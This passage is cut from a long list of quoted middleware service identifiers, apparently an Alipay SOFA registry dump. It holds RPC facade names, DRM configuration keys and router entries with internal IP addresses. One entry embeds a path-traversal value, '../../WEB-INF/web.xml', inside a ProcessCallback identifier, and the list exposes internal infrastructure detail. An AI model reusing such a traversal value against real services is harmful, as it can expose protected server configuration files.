ailableAmountCalFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mpaasweb.common.service.facade.replays.AppLogFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbopenprod.common.service.facade.commodity.KbCommodityQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.icashiercore.common.service.facade.api.PaymentOptionService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_MINICENTER#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.sandboxhome:name=com.alipay.guardian.client.sofa.drm.GuardianDrm.guardianConfig,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.sofa.antschedulerconsole.endpoint.facade.IBatchItemInstanceRestFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:nearbyshopbase@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:antprocess_T@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbticketcenter.common.service.backend.api.BackendTicketModifyFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:instfluxdecision@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.69.213.178#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.secuinfos.common.service.facade.api.FundAnnouncementFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA-SCHEDULER-S-S-channelspop-scheduler#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.mobilegw.adapterservice.mosng.MosngAdapterService:1.0:trafficlimitcenter@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.rcservcenter.client.RcClientInvoker:1.0:rcsmart@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.ams-assistant:name=com.alipay.zcache.log.ams-assistant.logLevel,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.emcooperate.common.service.facade.SkillGroupInfoAllFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zpaas.zappinfo.facade.query.SystemQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.poscore:name=com.alipay.antvip.client.internal.drm.DrmControl.restrainStrategy,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.kbsales.common.service.facade.bcm.BPProcessCallbackFacade:1.0:createFinanceAuditProcessHandle@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finbaservice.biz.shared.rt.RiskValQuestionAnswerRepository:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.promodmp.service.facade.strategy.MktStrategyFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.finloancore.trust.service.facade.batchtask.api.TrustBatchTaskManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.bis.common.service.facade.usable.BisUsableService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.69.243.35#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.finpwm:name=com.alipay.finpwm.biz.wishsavings.drm.impl.WishSavingsSysDRMResource.fixUnknowMaxRetry,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.finauth.common.service.facade.account.service.FundAccountManageFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.secucommunity.common.service.facade.user.api.SecuVipUserFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.30.192.45#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.mrchstm.common.service.facade.mart.facade.AssetZsActivityQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cloudbox:name=com.alipay.antvip.client.internal.drm.DrmSyncControl.unknownErrorIntervalSeconds,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.appxagg.common.service.facade.api.management.scenemsg.MsgRecordMngConfigFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.charge:name=com.alipay.routeclient.DefaultRouteCoordinator.whiteListRPCLoadTest,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.sofa.rpc.elastic.ElasticService:1.0:jupiter@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.dayutrprod.common.facade.fault.WhitePaperFaultFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finpromobus.common.service.facade.thirdparty.SceneContentFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.charge:name=com.alipay.cif.utils.probe.ProbeDrmSwitch.reportEnabled,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.kabaoprod.service.facade.ldc.AlipassLDCFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opscloudcore.framework.core.facade.OpscloudClientSyncServiceFacade:1.0:sigmaboss@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:../../WEB-INF/web.xml@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.overseacommon.common.components.twa.facade.TwaAdapterFacade:1.0:apshopcenter@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.fundapplication:name=com.alipay.common.datacollector.rule.internal.DataModelRuleCoordinator.dataModelWeight,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.xviewcore:name=com.alipay.xview.core.provider.drm.CacheProviderSwitch.queryDigestLogControlStr,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mobilecodec.service.facade.ShortLinkFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.riskctrl.common.service.facade.punish.PunishStrategyFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finfocore:name=com.alipay.finfocore.common.service.integration.drm.DrmCdsLdcManager.defaultTairCachedExpires,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.finpwm:name=com.alipay.finpwm.biz.wishsavings.drm.impl.WishSavingsParamsDRMResource.enterRecommendNums,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","SOFA_PRC_TRANSMIT_ANTBUSERVICE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.qconsole.facade.openapi.OmOpenApiFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.baoxianprod.common.facade.PolicySearchFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Servers_TP_M_MARKET#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.dctlib.common.repository.mng.ConfigQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:bkdepmng_feImportProcessCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.memberprod.common.service.relation.FamilyRelationService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antopo.common.service.facade.biz.archspec.TntInstCodeSpecFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:linke@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.52.236.47#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.giftprod.common.service.facade.prize.TaskPrizeFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.certify.service.facade.CertifyInfoQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.addpLoadtestTair.elastic,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.iopencore.common.service.manager.BizPackageDTOManager:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilechat.common.service.facade.api.BcTenantInfoManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finmobilemarket.common.service.facade.api.FundOrderFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.83.128.143#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.antgroup.zmxy.zmepinfocenter.common.service.facade.api.baseinfo.EpBasicInfoService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchcommerce.mrchlabcore.common.service.facade.api.entrance.ShopManageGzoneFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilecodec.common.spi.service.MobileCodecRouteService:1.0:siteprobe@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.aciamcore.common.service.facade.identity.StsActorServiceFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","DATA_ID_100.88.152.29#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.prodmng:name=com.alipay.slaguard.common.drm.SlaGuardConfigDrm.slaLogParamSet,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.imtmsvcprod.common.service.facade.dapply.DeviceApplyTmallAggrementServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.secuinfos.common.service.facade.api.datasync.BrandInfoSyncFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.riskmng:name=com.alipay.sofa.middleware.switcher.drm.GlobalSwitchResource.enableHeadCarry,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.sofa.rpc.elastic.ElasticService:1.0:income@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.securitydata.common.service.facade.sdlib.namelist.CustomerBlackListService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.promocenter:name=com.alipay.promocenter.common.drm.MerchantOperatorResource.operatorPickPidSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","config:com.alipay.sofa.rpc.elastic.ElasticService:1.0:pcreditrmp-parent@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","config:com.alipay.fc.paramcore.common.service.standard.facade.api.ParmClientRegisterFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","config:com.alipay.fc.mif.common.service.facade.MerchantClassificationQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.fundboss.common.service.facade.issue.FundIssueCauseFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zpdcore:name=com.alipay.fc.pdcore.common.util.drm.PsGrayDrm.openQueryServiceAbtest,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","config:com.taobao.notify.management.service.MsgDeliveryService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.alcorporation.common.service.facade.api.AlCorpManagerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:bkdepmng_fundGroupGuestCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:kbompKBProcessCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.50.98.98#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_30.50.4.163#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.overseaexprod.common.ipromo.mobilerpc.facade.service.UserAgreementQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.coreQualityPlus.common.facade.service.api.TriggerTestCaseQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:lifeprod_lifeAppPublishCallBack@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.fcbuservice.common.service.facade.DomainActionFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.mrchpunish.facade.cicada.riskEvent.RiskEventMngFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","DATA_ID_30.73.26.210#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.finquotationcenter.common.service.facade.api.FundQuotationQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.imasp.common.service.facade.SnsServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.finfocoreRzoneTair_dest.ldcTairWeight,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.gfas:name=com.alipay.common.tracer.manage.TracerDrm.zdalOcsDigestLogThreshold,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.frdecision.common.service.facade.api.ActivityManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:finlinkanalysis@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:bkmissione_voucherTemplateFailCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.linke.aci.core.facade.CIJobProcessor:1.0:ciK8SJobProcessor@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alibaba.dataphin.pipeline.common.facade.core.common.PipelineTenantCleanOpenService:1.0:dataphin-pipeline@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcbenefitcore.facade.service.DiscountConfigManagerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.common.core.client.AppInvokeService:1.0:kbadvert@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:fccfmng_ExchangeRateInsertManageCallbackProcessor@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.air.sdk.impl.dynamic.DynamicModuleClient:1.0:malgo@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","pcreditcheck@msgbrokerMosn#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.yqdataservice.common.service.facade.spider.YqMessageStatusFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilecashier.senior.service.facade.MobilecashierOrderFacade:1.0:escrowexprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cicada.cide.common.service.facade.api.TemplateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mquery.common.service.facade.report.ForexOrderFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antmember.common.service.facade.goldeneye.channel.GoldenEyeChannelService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbservcore.common.service.facade.notice.NoticeQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finbatch:name=com.alipay.common.tracer.manage.TracerDrm.zdalTairDigestLogThreshold,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.sofa.rpc.elastic.ElasticService:1.0:asop@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mapi.gateway.invoke.webservice.SysExterfaceInvokeService:1.0:insttrade@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobileappcommon.common.service.facade.baas.GreyTemplateConfigFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finaggexpcore.common.service.facade.cardfavorites.CardFavoritesFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.promox.facade.crowd.CategoryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchprod.common.service.facade.category.CategoryOrderFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.55.129.151#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.adcharge.common.service.facade.api.admin.AdDeliveryServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.client.SystemAppInvokeService:1.0:certify@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cmsmng:name=com.alipay.routeclient.DefaultRouteCoordinator.unCompress,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mobilerelation.common.service.facade.InitDatas4TestFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.promocenter:name=com.alipay.promocenter.common.drm.PromocenterBussinessParamsDrmResource.promoKernelCodeVoucherSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","NS_Pub_Servers_TP_F_ACCOUNTINGTRANS_*#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.kbsettle.biz.service.common.test.TestMessageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA-SCHEDULER-S-S-isasp-scheduler#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.kbservindustryprod.common.service.facade.backend.TmallLockModifyFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.riskmng:name=com.alipay.riskmng.biz.platform.task.complainevent.drm.GotoneConfigResource.newTemplateEnabled,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.finfundtaskcenter.service.facade.OperateCheckFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fundselling.facade.repayment.RepaymentPlanService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cloudprovision:name=com.alipay.antvip.client.internal.drm.DrmControl.printStatInfoIntervalSec,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.scardcenter.common.service.facade.OfflinepayWhiteListFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.secucommunity.speech.api.topic.ParticipatedBizRecordFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.181.44#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.testCacheTbase.useKeyRouteInfo,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","config:com.alipay.sofa.rpc.elastic.ElasticService:1.0:frdataaccess@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","config:cn.com.antcloud.acprovisioncore.common.facade.application.AppInfoFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","Alipay.revcore:name=com.alipay.revcore.common.drm.FinacDrmData.loadAccountingSize,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_11.158.91.198#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.appxprod.common.service.facade.api.attribute.CatalogAttributeMngFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.lendpofprod.common.service.facade.api.cashier.BillInfoQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.mosng.MosngAdapterService:1.0:lifemsgprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.girisk.strategy.service.facade.api.event.EventCustomDataQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.dqm.realtimeverify.RealtimeVerifyFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilecodec.common.spi.service.MobileCodecRouteService:1.0:cashier@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:mindv@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.promoplaycenter.common.module.facade.PlayCenterModuleFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.atd:name=com.alipay.slaguard.common.drm.SlaGuardConfigDrm.faultInGlobalSwitchValue,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","config:com.alipay.mrchprod.common.service.facade.orginization.MrchProdRealStoreMngFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","NS_Pub_Servers_PAROID_TEST#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.superapi.common.core.client.AppInvokeService:1.0:kbomp@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.alphad.common.service.facade.markresult.api.IMarkResultTaskFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.finorm.finriskcenter.common.facade.api.guardian.DbDataSourceServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.discount.common.service.facade.campaignstatus.DstCampaignStatusQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.acgotonecore.facade.service.GotoneBatchServiceForInternalFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.yebplus.common.facade.service.api.yebscene.query.FinVirtualAssetQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.nodejs.ConsumerService:1.0:tile@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.caprod.service.ukey.facade.UkeyServiceTimeInfoQueryService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_S_1224#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.lifemng.facade.ebpp.EbppgwErrorCodeFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_C_APPSTORE#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","HEALTHY@finscprod#@#DEFAULT_INSTANCE_ID#@#SOFA-HEALTHY","com.alipay.iaassettrans.facade.common.voucher.api.AssettransVoucherCommonFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.routeclient.interfacename:algoevaluator#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.cloudengine:name=com.alipay.cloudengine.resmanager.insttrade.resValue,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_11.124.134.232#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_11.158.44.237#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.ofpgrowth.common.service.facade.api.NumberOneCardQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.166.169.233#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.sofa.rpc.elastic.ElasticService:1.0:staticrescore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.mwalletmng:name=com.alipay.common.webx.session.drm.SessionLogDrm.formtokenSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","SOFA_PRC_TRANSMIT_TRADEFRONT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zskynet.facade.alarmcheck.BizSolutionRegisterFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.acdoccore.common.service.facade.category.DocProdutcConfManageFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.afts.common.service.facade.FileFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finstore.common.service.facade.fop.api.PromoDaySubscribeFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.tradeapcore:name=com.alipay.ambush.netmock.rule.NetmockRuleCoordinator.netmockRule,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:common_fc_processCallBack@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openinsight.common.service.facade.rec.api.RecItemLabelRelQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.security.sandbox.runtime.facade.service.SecuritySandboxExperimentDataFacade:1.0:infosectask@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cdp.common.service.facade.space.api.CdpSpaceObjectApiService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Servers_TP_C_INST#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.minicenter.common.service.facade.api.miniapp.MiniCoreQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.airbops:name=com.alipay.common.security.dresource.SecurityCommonDrm.customJsonSuffixRegex,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.openhome.facade.college.materialtag.MaterialTagFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilerelation.common.service.facade.CompoundInfoQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.paylink.service.facade.TradeOrderSyncSpiFacade:1.0:mrchorder@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipaymo.momobilewallet.common.facade.transfer.TransferCashierConsultFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.etetestcore.service.api.yebplus.YebPlusTransferInService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.necbill.common.service.fee.FeeFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.Arch:name=com.alipay.xts.ldc.lendpofprod.changeMode,version=1.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_11.166.235.189#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.frdspcore.common.service.facade.api.RiskEventManagerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opscloudcore.framework.core.facade.OpscloudClientServiceFacade:1.0:antc@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_ASSETTRANS#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchmobile.common.service.facade.widget.mng.AppConfigFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.intimateprod.common.service.facade.spi.task.TaskExecuteCBFacade:1.0:mwealthprod_lifeapp@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insautoagent.common.telworkbench.AutoInsEmployeeCommandFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.inshealthcore.common.service.facade.api.policy.GiftPolicyQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.83.88.211#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.voucherprod.facade.api.asset.VcpAssetEventProcessFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cicada.common.service.facade.api.operation.AppDeployFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.recproxy.common.service.facade.api.RecommendFacade:1.0:interstellar@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.secuinfos.biz.datasync.express.service.ExpressDataSyncService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.uioservice.common.service.facade.api.ContentAggregationService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.M